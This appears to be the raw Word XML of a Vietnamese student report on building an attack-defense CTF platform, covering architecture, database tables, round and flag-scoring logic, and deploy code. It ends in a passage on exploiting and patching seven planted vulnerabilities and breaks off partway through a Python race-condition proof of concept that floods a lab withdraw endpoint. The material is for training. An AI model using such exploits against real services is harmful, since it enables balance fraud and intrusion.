      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đối với thí sinh: Đăng nhập hệ thống Git Gitea để lấy code, chỉnh sửa và đẩy code lên để deploy tự động; đăng nhập Gameserver để xem bảng điểm Scoreboard, trạng thái Uptime dịch vụ và nộp các flag khai thác được.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đối với Gameserver: Quản lý vòng đấu theo chu kỳ thời gian (2 phút/round); sinh flag ngẫu nhiên và đẩy vào dịch vụ của các đội; kiểm tra SLA khả dụng dịch vụ; tiếp nhận, xác thực flag và cập nhật điểm số.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đối với Deploy Webhook: Nhận tín hiệu push từ Git, chạy tiến trình ngầm để cập nhật code và build lại container bị ảnh hưởng.</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Yêu cầu phi chức năng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tính cô lập: Sự cố bảo mật hoặc mã độc trên container của đội 1 tuyệt đối không thể ảnh hưởng sang đội 2 hay Gameserver chính.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tính công bằng: Chặn đứng các hành vi nộp lại flag cũ, nộp flag đội mình, hoặc brute-force đoán flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.2. Kiến trúc mạng tổng thể hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hệ thống triển khai trên một máy chủ duy nhất chạy hệ điều hành Linux Ubuntu. Mạng ảo `ctf-network` dạng Bridge kết nối 5 thành phần chính: container `ctf-gameserver`, container `ctf-gitea`, container `ctf-deploy-webhook` và 2 container dịch vụ của các đội `ctf-team1-service` và `ctf-team2-service`. Chỉ có cổng `8000` (Gameserver), `3000` (Gitea) và các cổng dịch vụ thi đấu (`8001`, `8002`) được NAT ra ngoài mạng vật lý. Mạng nội bộ cho phép Gameserver kết nối trực tiếp đến các container dịch vụ mà không lộ luồng dữ liệu quản trị ra ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.3. Thiết kế Cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cơ sở dữ liệu của Gameserver được lưu trữ bằng SQLite tại tệp tin `gameserver.db`. Cấu trúc chi tiết các bảng được thiết kế như sau:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2257"/>
        <w:gridCol w:w="2257"/>
        <w:gridCol w:w="2257"/>
        <w:gridCol w:w="2257"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2257"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên trường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2257"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kiểu dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2257"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ràng buộc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2257"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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id</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INTEGER</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PRIMARY KEY AUTOINCREMENT</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Mã định danh duy nhất của đội</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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username</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TEXT</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UNIQUE NOT NULL</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Tên đăng nhập tài khoản đội</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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password</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TEXT</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NOT NULL</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Mật khẩu đăng nhập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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attack_points</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REAL</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DEFAULT 0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2257"/>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Tổng điểm tấn công kiếm được</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 3.1: Cấu trúc bảng teams trên Gameserver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3010"/>
        <w:gridCol w:w="3010"/>
        <w:gridCol w:w="3010"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3010"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên trường</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3010"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kiểu dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3010"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mô tả</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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round</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INTEGER</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Chỉ số vòng đấu sinh ra flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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team_id</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INTEGER</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ID của đội sở hữu flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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flag_type</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TEXT</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Vị trí lưu trữ ('db', 'file', 'env')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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flag_value</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TEXT</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Chuỗi flag cụ thể</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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is_captured</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INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3010"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trạng thái đã bị chiếm đoạt hay chưa (0/1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 3.2: Cấu trúc bảng flag_logs trên Gameserver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.4. Thiết kế luồng xử lý chính</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Luồng sinh và đẩy Flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Tại thời điểm khởi đầu của mỗi Round (kéo dài 120 giây), Gameserver sẽ tự động sinh ra 3 chuỗi flag ngẫu nhiên cho mỗi đội. Sau đó, Gameserver gửi request POST kèm API Token xác thực tới từng Team Service để cập nhật: Flag 1 ghi vào bảng `private_messages` trong SQLite nội bộ; Flag 2 ghi đè vào tệp `/flag.txt`; Flag 3 ghi vào biến môi trường hệ thống.</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Luồng nộp Flag và tính điểm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Đội chơi tấn công dịch vụ đối thủ, trích xuất được chuỗi flag và gửi lên endpoint `/submit` của Gameserver. Gameserver xác thực: (1) Flag có tồn tại trong database không? (2) Flag thuộc vòng đấu hiện tại hoặc liền trước không? (3) Flag có phải của chính đội nộp không? (4) Đội chơi đã nộp flag này trước đó chưa? Nếu tất cả điều kiện thỏa mãn, đội nộp được cộng 20 điểm tấn công, đội bị khai thác bị trừ 10 điểm phòng thủ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 4: XÂY DỰNG VÀ PHÂN TÍCH CHI TIẾT MÃ NGUỒN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1. Cấu trúc thư mục của dự án</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hệ thống được tổ chức thành các thành phần độc lập trong thư mục gốc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gameserver/: Chứa mã nguồn điều phối giải đấu, giao diện scoreboard và sla_checker.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>deploy-webhook/: Trình lắng nghe Webhook CI/CD để tự động build và chạy lại container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vuln-service/: Chứa mã nguồn ứng dụng sàn giao dịch mẫu tích hợp lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2. Phân tích mã nguồn Gameserver và SLA Checker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mã nguồn chính của Gameserver nằm ở `gameserver/app.py`. Luồng nền quản lý vòng đấu được thực hiện qua hàm sau:</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def game_loop_thread():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while True:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            db = sqlite3.connect(DB_PATH)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            db.row_factory = sqlite3.Row</w:t>
              <w:br/>
              <w:t xml:space="preserve">            cursor = db.cursor()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            cursor.execute("SELECT value FROM game_state WHERE key = 'game_started'")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            game_started = cursor.fetchone()['value'] == '1'</w:t>
              <w:br/>
              <w:t xml:space="preserve">            if game_started:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                cursor.execute("SELECT value FROM game_state WHERE key = 'round_end_time'")</w:t>
              <w:br/>
              <w:t xml:space="preserve">                round_end_time = int(cursor.fetchone()['value'])</w:t>
              <w:br/>
              <w:t xml:space="preserve">                now = int(time.time())</w:t>
              <w:br/>
              <w:t xml:space="preserve">                if now &gt;= round_end_time:</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    run_round_tick()  # Kích hoạt vòng mới</w:t>
              <w:br/>
              <w:t xml:space="preserve">            db.close()</w:t>
              <w:br/>
              <w:t xml:space="preserve">        except Exception as e:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            print(f"[ERROR] {e}")</w:t>
              <w:br/>
              <w:t xml:space="preserve">        time.sleep(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SLA Checker (`gameserver/sla_checker.py`) đóng vai trò người dùng ảo kiểm tra tính năng dịch vụ của các đội chơi. Hàm `run_sla_check` thực thi chuỗi request HTTP kiểm thử: (1) Trang chủ trả về 200, (2) Endpoint /register cho phép tạo tài khoản mới, (3) Đăng nhập thành công với tài khoản vừa tạo, (4) Cho phép gửi tin nhắn riêng tư, (5) Tính năng tìm kiếm sản phẩm hoạt động, và (6) Cho phép cập nhật profile. Nếu bất kỳ bước nào lỗi hoặc timeout quá 3 giây, đội chơi sẽ bị tính là DOWN SLA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.3. Phân tích mã nguồn Deploy Webhook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dịch vụ `deploy-webhook` nhận payload JSON gửi sang từ Gitea Webhook khi có lệnh push. Giao diện tiếp nhận xử lý trên nhánh main và khởi chạy một tiến trình ngầm (thread) để không làm nghẽn kết nối của Gitea:</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def execute_deploy(team_name, repo_name):</w:t>
              <w:br/>
              <w:t xml:space="preserve">    try:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        repo_path = os.path.join(WORKSPACE_DIR, 'teams', repo_name)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        # 1. Thực hiện git pull kéo code mới</w:t>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(['git', 'pull', 'origin', 'main'], cwd=repo_path, check=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        # 2. Biên dịch lại Image của đội cụ thể bằng Docker Compose</w:t>
              <w:br/>
              <w:t xml:space="preserve">        service_name = f"{team_name}-service"</w:t>
              <w:br/>
              <w:t xml:space="preserve">        compose_file = os.path.join(WORKSPACE_DIR, 'docker-compose.yml')</w:t>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(['docker', 'compose', '-f', compose_file, 'build', service_name], check=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">        # 3. Chạy lại container</w:t>
              <w:br/>
              <w:t xml:space="preserve">        subprocess.run(['docker', 'compose', '-f', compose_file, 'up', '-d', service_name], check=True)</w:t>
              <w:br/>
              <w:t xml:space="preserve">    except Exception as e:</w:t>
              <w:br/>
              <w:t xml:space="preserve">        print(f"[DEPLOY ERROR] {e}")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="160" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 5: KHAI THÁC VÀ VÁ 7 LỖ HỔNG BẢO MẬT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2B5E8C"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1. Lỗ hổng 1: Race Condition (Web/Business Logic)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mô tả: Hàm rút tiền `/api/withdraw` thực hiện đọc số dư, trì hoãn 0.5 giây bằng `time.sleep(0.5)` rồi thực hiện ghi đè số dư mới. Khi kẻ tấn công gửi đồng thời nhiều yêu cầu song song, các yêu cầu này đều đọc được số dư ban đầu trước khi hệ thống kịp ghi nhận thay đổi, dẫn đến nhân đôi/nhân nhiều lần số dư tài khoản ảo.</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Mã nguồn PoC khai thác bằng Python:</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import threading, requests</w:t>
              <w:br/>
              <w:t>url = "http://192.168.29.157:8002/api/withdraw"</w:t>
              <w:br/>
              <w:t>cookies = {"session_token": "[USER_TOKEN]"}</w:t>
              <w:br/>
              <w:t>def send_req():</w:t>
              <w:br/>
              <w:t xml:space="preserve">    requests.post(url, data={"amount": "50"}, cookies=cookies)</w:t>
              <w:br/>
              <w:t>threads = [threading.Thread(target=send_req) for _ in range(5)]</w:t>
